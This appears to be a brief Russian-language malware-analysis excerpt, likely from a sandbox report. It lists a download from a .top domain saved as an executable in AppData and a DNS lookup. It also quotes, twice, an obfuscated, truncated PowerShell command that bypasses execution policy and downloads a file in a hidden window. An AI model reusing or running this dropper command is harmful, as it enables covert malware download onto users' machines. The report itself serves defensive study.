Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^WE^R^s^hel^L^.Ex^e -EX^ecUt^IONPo^lIc^Y^ Byp^aSS ^-^N^o^Pr^O^F^Ile^ -WiN^d^O^w^sty^Le^ H^id^DeN^ (^N^e^W-O^BJe^C^T^ s^yStEM.NeT.^wEB^c^L^I^E^N^t^).^dOw^NLo^ADFilE^(^'http...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^o^WE^R^s^hel^L^.Ex^e -EX^ecUt^IONPo^lIc^Y^ Byp^aSS ^-^N^o^Pr^O^F^Ile^ -WiN^d^O^w^sty^Le^ H^id^DeN^ (^N^e^W-O^BJe^C^T^ s^yStEM.NeT.^wEB^c^L^I^E^N^t^).^dOw^NLo^ADFilE^(^'http...' (со скрытым окном)